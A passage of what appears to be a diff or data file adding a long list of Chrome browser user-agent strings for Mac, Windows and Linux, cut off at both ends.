en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.0 Safari/534.16 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.17 (KHTML, like Gecko) Chrome/11.0.655.0 Safari/534.17 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.414.0 Safari/534.1 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.2 (KHTML, like Gecko) Chrome/6.0.451.0 Safari/534.2 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.458.1 Safari/534.3 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.461.0 Safari/534.3 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.464.0 Safari/534.3 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; fr-FR) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.126 Safari/533.4 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.639.0 Safari/534.16 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.134 Safari/534.16 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-US) AppleWebKit/534.18 (KHTML, like Gecko) Chrome/11.0.660.0 Safari/534.18 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.125 Safari/533.4 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7_0; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.7 Safari/533.2 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7_0; en-US) AppleWebKit/534.21 (KHTML, like Gecko) Chrome/11.0.678.0 Safari/534.21 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_8; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.5 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.86 Safari/533.4 +Mozilla/5.0 (Macintosh; U; Mac OS X 10_5_7; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/ Safari/530.5 +Mozilla/5.0 (Macintosh; U; Mac OS X 10_6_1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/ Safari/530.5 +Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/11.0.696.50 +Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/12.0.742.91 +Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 +Mozilla/5.0 (Windows 8) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.112 Safari/534.30 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36 +Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 +Mozilla/5.0 (Windows NT 5.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.43 Safari/534.24 +Mozilla/5.0 (Windows NT 5.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.700.3 Safari/534.24 +Mozilla/5.0 (Windows NT 5.1) AppleWebKit/534.25 (KHTML, like Gecko) Chrome/12.0.704.0 Safari/534.25 +Mozilla/5.0 (Windows NT 5.1) AppleWebKit/534.25 (KHTML, like Gecko) Chrome/12.0.706.0 Safari/534.25 +Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.66 Safari/535.11 +Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1 +Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1 +Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.792.0 Safari/535.1 +Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.809.0 Safari/535.1 +Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.810.0 Safari/535.1 +Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.813.0 Safari/535.1 +Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.815.0 Safari/535.1 +Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.860.0 Safari/535.2 +Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.864.0 Safari/535.2 +Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.872.0 Safari/535.2 +Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.6 (KHTML, like Gecko) Chrome/16.0.897.0 Safari/535.6 +Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3 +Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.6 Safari/537.11 +Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36 +Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.16 Safari/537.36 +Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36 +Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36 +Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36 +Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 +Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 +Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36 +Mozilla/5.0 (Windows NT 5.2) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.112 Safari/534.30 +Mozilla/5.0 (Windows NT 5.2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.792.0 Safari/535.1 +Mozilla/5.0 (Windows NT 5.2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.794.0 Safari/535.1 +Mozilla/5.0 (Windows NT 5.2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.813.0 Safari/535.1 +Mozilla/5.0 (Windows NT 5.2; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1 +Mozilla/5.0 (Windows NT 5.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7 +Mozilla/5.0 (Windows NT 6.0) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.3 Safari/534.24 +Mozilla/5.0 (Windows NT 6.0) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100 Safari/534.30 +Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.66 Safari/535.11 +Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.1 Safari/535.1 +Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1 +Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 +Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1 +Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.792.0 Safari/535.1 +Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2 +Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7 +Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.36 Safari/536.5 +Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.34 Safari/534.24 +Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.699.0 Safari/534.24 +Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11 +Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.66 Safari/535.11 +Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.45 Safari/535.19 +Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 +Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1 +Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7 +Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7 +Mozilla/5.0 (Windows NT 6.0) yi; AppleWebKit/345667.12221 (KHTML, like Gecko) Chrome/23.0.1271.26 Safari/453667.1221 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.694.0 Safari/534.24 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.3 Safari/534.24 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.697.0 Safari/534.24 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.699.0 Safari/534.24 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/12.0.702.0 Safari/534.24 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.113 Safari/534.30 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.66 Safari/535.11 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.801.0 Safari/535.1 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.812.0 Safari/535.1 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.815.10913 Safari/535.1 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.861.0 Safari/535.2 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.8 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.8 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.13 (KHTML, like Gecko) Chrome/24.0.1284.0 Safari/537.13 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.2 (KHTML, like Gecko) Chrome/22.0.1216.0 Safari/537.2 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.90 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; en-US) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.750.0 Safari/534.30 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.12 Safari/534.24 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/12.0.702.0 Safari/534.24 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.53 Safari/534.30 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.66 Safari/535.11 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.810.0 Safari/535.1 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.811.0 Safari/535.1 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.813.0 Safari/535.1 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.814.0 Safari/535.1 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.8 (KHTML, like Gecko) Chrome/17.0.940.0 Safari/535.8 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.62 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1623.0 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 +Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.66 Safari/535.11 +Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.0 Safari/536.3 +Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3 +Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3 +Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6 +Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.26 Safari/537.11 +Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.13 (KHTML, like Gecko) Chrome/24.0.1290.1 Safari/537.13 +Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1464.0 Safari/537.36 +Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1467.0 Safari/537.36 +Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4 +Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36 +Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.65 Safari/535.11 +Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.66 Safari/535.11 +Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24 +Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.17 Safari/537.11 +Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.13 (KHTML, like Gecko) Chrome/24.0.1290.1 Safari/537.13 +Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.14 (KHTML, like Gecko) Chrome/24.0.1292.0 Safari/537.14 +Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.15 (KHTML, like Gecko) Chrome/24.0.1295.0 Safari/537.15 +Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/19.77.34.5 Safari/537.1 +Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36 +Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1500.55 Safari/537.36 +Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36 +Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 +Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 +Mozilla/5.0 (Windows NT 7.1) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.112 Safari/534.30 +Mozilla/5.0 (Windows NT) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20 +Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13 +Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.55 Safari/525.19 +Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.6 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.198 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE) Chrome/4.0.223.3 Safari/532.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-CA) AppleWebKit/534.13 (KHTML like Gecko) Chrome/9.0.597.98 Safari/534.13 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13(KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.29 Safari/525.13 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/4.0.202.0 Safari/525.13. +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/7.0.0 Safari/700.13 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.151.0 Safari/525.19 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.152.0 Safari/525.19 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.153.0 Safari/525.19 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.153.1 Safari/525.19 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.3.155.0 Safari/525.19 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.4.154.18 Safari/525.19 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.39 Safari/525.19 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.43 Safari/525.19 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.48 Safari/525.19 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.50 Safari/525.19 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.53 Safari/525.19 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.55 Safari/525.19 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/528.10 (KHTML, like Gecko) Chrome/2.0.157.0 Safari/528.10 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/528.10 (KHTML, like Gecko) Chrome/2.0.157.2 Safari/528.10 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/528.11 (KHTML, like Gecko) Chrome/2.0.157.0 Safari/528.11 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/528.4 (KHTML, like Gecko) Chrome/0.3.155.0 Safari/528.4 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/528.8 (KHTML, like Gecko) Chrome/2.0.156.0 Safari/528.8 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/528.8 (KHTML, like Gecko) Chrome/2.0.156.0 Version/3.2.1 Safari/528.8 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/528.8 (KHTML, like Gecko) Chrome/2.0.156.1 Safari/528.8 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/528.9 (KHTML, like Gecko) Chrome/2.0.157.0 Safari/528.9 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.1 (KHTML, like Gecko) Chrome/2.0.169.0 Safari/530.1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.1 (KHTML, like Gecko) Chrome/2.0.170.0 Safari/530.1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.0 Safari/530.5 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.2 Safari/530.5 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.40 Safari/530.5 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.42 Safari/530.5 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.8 Safari/530.5 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.173.0 Safari/530.5 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.173.1 Safari/530.5 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.174.0 Safari/530.5 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.6 (KHTML, like Gecko) Chrome/2.0.174.0 Safari/530.6 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.6 (KHTML, like Gecko) Chrome/2.0.175.0 Safari/530.6 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.7 (KHTML, like Gecko) Chrome/2.0.175.0 Safari/530.7 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.7 (KHTML, like Gecko) Chrome/2.0.176.0 Safari/530.7 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.7 (KHTML, like Gecko) Chrome/2.0.177.0 Safari/530.7 +Mozilla/5.0 (Windows; 